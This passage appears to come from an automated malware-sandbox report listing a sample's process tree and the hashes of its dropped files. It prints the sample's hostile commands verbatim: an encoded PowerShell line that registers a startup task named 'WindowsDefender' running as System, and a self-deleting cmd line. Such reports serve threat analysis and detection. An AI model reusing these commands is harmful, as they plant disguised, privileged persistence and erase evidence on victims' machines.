C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"6⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"7⤵PID:736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:4908
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2644
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2340
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:1980
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2024
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4540 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 4164 -ip 41642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2544
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 3276 -ip 32762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4780
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 2404 -ip 24042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1684
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 500 -p 2500 -ip 25002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4868
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 224 -p 832 -ip 8322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2864
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 408 -ip 4082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2332
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1732 -ip 17322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4740
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 224 -p 2400 -ip 24002⤵PID:1524
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4336 -ip 43362⤵PID:2768
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 500 -p 4620 -ip 46202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1716
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4744 -ip 47442⤵PID:1228
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4236 -ip 42362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4192
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 1948 -ip 19482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3280
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 3084 -ip 30842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4556
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 1240 -ip 12402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:944
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3684 -ip 36842⤵PID:3532
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 1036 -ip 10362⤵PID:4764
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 3148 -ip 31482⤵PID:4464
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 224 -p 2424 -ip 24242⤵PID:2956
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4476 -ip 44762⤵PID:3668
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 1228 -ip 12282⤵PID:4788
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3132 -ip 31322⤵PID:4892
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 224 -ip 2242⤵PID:1844
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 4240 -ip 42402⤵PID:2176
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4860 -ip 48602⤵PID:3012
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1644 -ip 16442⤵PID:3024
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 3448 -ip 34482⤵PID:2004
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 3120 -ip 31202⤵PID:2552
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 3772 -ip 37722⤵PID:1320
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 3860 -ip 38602⤵PID:4692
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4688 -ip 46882⤵PID:1820
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4940 -ip 49402⤵PID:2360
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2052
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:2404
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2404 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3720
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2500
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2500 -s 7922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4668
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:832
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 832 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3012
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:408
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 408 -s 7802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1680
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1732
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1732 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3448
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:2400
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2400 -s 2282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3456
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4620
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4620 -s 7442⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4256
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:4336
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4336 -s 6802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:940
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:4744
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4744 -s 3842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1952
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:4236
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4236 -s 3562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1892
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:1948
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1948 -s 3562⤵
- Program crash
PID:4544
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:3084
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3084 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1140
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:1240
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1240 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3712
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3684 -s 4921⤵
- Program crash
PID:1940
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1036 -s 3561⤵
- Program crash
PID:1864
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3148 -s 4321⤵
- Program crash
PID:2916
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2424 -s 4681⤵
- Program crash
PID:3632
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4476 -s 4881⤵
- Program crash
PID:3692
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1228 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1228 -s 2442⤵
- Program crash
PID:5004
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3132 -s 5001⤵
- Program crash
PID:4644
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 4201⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4544
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4240 -s 4721⤵
- Program crash
PID:2732
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4860 -s 4921⤵
- Program crash
PID:4324
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1644 -s 4001⤵
- Program crash
PID:3100
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3448 -s 3561⤵
- Program crash
PID:2432
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3120 -s 4801⤵
- Program crash
PID:1732
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3772 -s 4321⤵
- Program crash
PID:1436
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3860 -s 4441⤵
- Program crash
PID:3424
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4688 -s 3961⤵
- Program crash
PID:2928
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4940 -s 4961⤵
- Program crash
PID:3720
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
Filesize
36KB
MD5243d5f63c7130bb365b36bd606086e46
SHA1a1477b17e92e6210d423a7084c1ed794043397c7
SHA25648dac6f702967bfa16392d24bf8cb4577600bfb3ec0328b969c4d3eb707de2ef
SHA512646d02c1bbb4098b9b2e8c1c2a2fe31807048a61e232ce3abeab1cf1fb50e3094201a9ebf06c7f2d2c789e583bd59d6716e70c302e41c8d61fcbf4bf9e238697
-
Filesize
13KB
MD563cf9f11b7acbcc3a0974922d11b9b10
SHA187e6fd212abd80650f88c07e158d30bdd8273186
SHA2568851458f8fe3caca2b1b9a78ece5fae88beebc6a32b7aca35d445146e12a6f24
SHA51225b23f8dfa5df5d26011c3eeda7fd1c3a341dce99826b2a7968ae4e1a1371cb3cacf4ff0a7e61558991121809270ab99682157a2beba09e03139477c4e0cec7a
-
Filesize
35KB
MD503100eacafb083f5432d7f67ed015f74
SHA1967b38bebd0329c7d9c32bed301e624317a6031a
SHA256e01d51af096f2af59d0a8124a48aaebc0646e882e0859b50524a9425df837378
SHA5123affc54f5914a27e8b603ddd8b5871d5e20d4fd4f1a49e8de0d71f76a66d3694fe53f33455c9898038c284f1acc69094df2177959980c537f7194958b9e89905
-
Filesize
13KB
MD5e287a69b04340d41cba0f05926076339
SHA13ff5b95fc2ee7a9cc45368548b97dbb1e03462ce
SHA2569e9dd8b9718f232bcd3cbf589e7aad7bdc1170b53159e7375ec99530df101272
SHA512d6bb99aaa09491715742d178639a42e546095b921b95b675e069bfd4bf2f43fc7e8bf65e04e3d9d30567f268f93c0943cd5d23566b7261294b9d9f27745773d0
-
Filesize
36KB
MD5d02eba271c159725647c77f651e772e0
SHA171eb18a0b8942fd7b27028f9932ea371d4dc1d29
SHA2565b4b7d628cd830f2f69b823b8c27ef67635d372981de7d59d8f6e24158fa789e
SHA51268881c3e54b83ce96f0645352109a5e060ad16ac3dcf4b7d3ace0388d1a90ecfb1ddcf9252ae693be05f679733c1f25930244560c65f78e1006e289eb5692319
-
Filesize
13KB
MD5bbbe2eaad759d3f30ad8e9eae34945ec
SHA1a603e6b3659c1713613aa5ca5087015f15fac9d0
SHA256550818128aa84b0a2383e2e5229a37e8106d09f06a26bfe4cb668b7b5045145e
SHA5125800d514c8c5a0fbea27bcf367dc34ed975b65ee483a337889d97cc7724ceb3084053e2430f101756ef21c8b04cd332e8d988d5394f87074a3cdf902376cdbd8
-
Filesize
35KB
MD5c351a34de9b920b560a2c7776c522e40
SHA1f0ae213c014eb7ee43d657b4a737436d6a11e369
SHA25679b4665eef394c9dcec1db4a18054a9996d30f07b573f356b5e5fab8b2fdaca6
SHA512b0ea2e7bcb6ba1790a2721af493e0a3c63e190bbb8652f00bf80a54c5d2b1fab28e20de3c2ae490a471d0d0e2e822256d5e84a532b4d61683f5042da616adbbb
-
Filesize
13KB
MD57ff390e0d3b069d66815b7f6a1834a7a
SHA1d2823bdb0282c416e7a63aeb69f1ea7ccbba8d78
SHA2562c1dd87746d8a34e22f0ac4020579252431c80f92be37d15473e5817abef65fa
SHA512de8eb1ef9dc7e3bffa81d8003f6a6e78ca9b72d8c750a6307ea1df8808602d6db6d161feda4ba08d8af38fc88cf33b584a52f88b5b9f71e46039de32c9f44d19
-
Filesize
36KB
MD51643ccef946fb2ed379cf3e29c0260a4
SHA1f54725cd15947387d4a5842ad27050dddef00fe1
SHA25680ad2a9ff737bc816a04cba33c111795c13d72612c3a7b67840d7dcd6651941d
SHA512ffc526337913f2981860053f3450a03c467246580daae604ee9741a290855c32b2b55701c770d8455bbef589cace0c1737a02f6391b621c3e0839a8871fe6eb2
-
Filesize
36KB
MD5af9dd512c51bec0f4188a233a8405236
SHA17bd7ba1a6529f441b5b8e44da2a516d7a525d9b3
SHA2569c32dcfdce4c40becd0389a658e1c2cef802d34cb21ea2989ed03b8112376a89
SHA512545e5454617cca1221be769abda3f353cecc039e1db766bc07aebd9d56c0f0184c6112fbdcd97792c858364b589f977959955b2a116e8a8cbe688430d924d267
-
Filesize
13KB
MD5b8fbec6a1b56789ee8de218a5b41bc5f
SHA1c61681d6253cf3a65e09ac99bd3e070bb3eca154
SHA256b757ab7fc7ca7ae06633f4ed14291ca4aa5ffff1e64ccc51cf9278f6fa5e40e3
SHA512498f4c44d94bd50ba7a3a4f38172d94d4befa28438a881474ebc41a5842c75c49a2e6283296f315642ec05dbe5e02c0837c51b32451104b76643e0fdaeee0297
-
Filesize
13KB
MD58b065a8dee2f706d2126769d9928e536
SHA1474b37893606662d9a7baf7457eba4ef11811e5a
SHA256f5a7a685ac8500af27342d85cf5849317e311417ef1f3e30829a78beb576dfe3
SHA512a7444ea59d1254298fa9b0402a8d71b1e6071a2d4845058e2972e64e3d205de91eedbaa2c5c6f8cd7766547f948f669e2d10ec6bb8bfd422ae702c213a7d9993
-
Filesize
36KB
MD5ab8f68ffc7caa43538c4ca41316ba816
SHA1db0ea52612ec9989bdf64288386ef86cd3e6fb0a
SHA256b282816e733b77736d9650eb88924772799e55dd21bce1867961ccad922cfe05
SHA512a16c79daa9e88cb4fc81b811ce1345f4c10befa9e18e7e31d127cdc722f95ca243b44e2dcbab5b753e4c36bf69730714be6aaf8681b438c88c8663138f571431
-
Filesize
13KB
MD525b41b7fb02cc902f8435e3b368681ec
SHA1252befa757513f91b1c231b8999989960c0b0569
SHA2563bc3f6eddad5faa3eb0270cb1a580c67ea510749abf63951a3ab6c5f0ef39a6b
SHA5126633c78f2597cbb3ed79ffce537a5af6bd4aa8007c5bd4f4d011ad5bef9768e692d056198af16399a0b6a1f9d4c48c0f18c66ef484808faeb9d40638ad48f9a1
-
Filesize
36KB
MD5364131f36547208806546d1f277ec30e
SHA146e3755480485449b4fe7cffccfca780d43b5d02
SHA25646ec60ba02ab1024609b071815895be2a3ee12b15dfbf7a3a7a91edf2e96e984
SHA5126b6348b7562710393fae117f112a6a23afd6dcf1b7e7d0321f40c841d36a852591c714c0f974ed02dfbca976c9eda4808fe0d4faaa89cef1c2bccff297216656
-
Filesize
38KB
MD5bd967cecd4c31d7a19ed945d51560c3b
SHA1385e0bd2e750ab9a69c2b143943396a191714623
SHA2560490212e1be50d2e84befd6c168487e2ad0461f91d5dde7b02df74791a882f15
SHA51207926e3b35127306f0d438a7a4018fb30a929f267d11e7f47a61f50523b6f56df58d00aa2f70184f51bb7db9677b021733557a6f13aa65b2bd5d9f7214b3c121
-
Filesize
38KB
MD55afa56d15b52aef824f58bb64f02da22
SHA1c87e38134f484aab1aa32ab246a4ecd6a08af717
SHA256180c8dfff84e9b69590c244d7331cd21e387b07e71d5331c8516084559c6715d
SHA512bace7732e7eb468d697b45642e393f895a2dda5d7bdeab3258d6a7f377ba729f21f7d9a3db91f9c4c7d0fe4ddf5053a8376c8d16a273f8c53e0234885266ccac
-
Filesize
13KB
MD5209eb9a46f2ec8671ba1633c4ba6b75d
SHA17b90ac451744d962c439953d58af1e6c771d36c8
SHA2564211875719fe294f1a8e155629e94ac2496f727b234ba72a9abf398a8ced7a60
SHA512af213d61f79056ff351139cd86c0ce91626ca8f32bdaeb1f983214e08195af2c682ed53691881eef36c3b0370d9e9c7ea94a96a2e113930f3ac4a7b4e653177c
-
Filesize
13KB
MD5fab72915f21ba05ad1a3a2caaa8aee11
SHA138b9d57a4f57ebc3bf62fc84af174205a78c4324
SHA2564049eb85fa2d0ae6acc71e06948c51dd34ccd004a089c39a8d8e152e74da4a39
SHA512698b230832cc82621473f77bfc999acdb93b5650630135ff33c6b1cc48a73e298971206f72406af8bafcf44aac1e4eaea43e634538e79ddd5291c9701593fc7b
-
Filesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
Filesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
Filesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
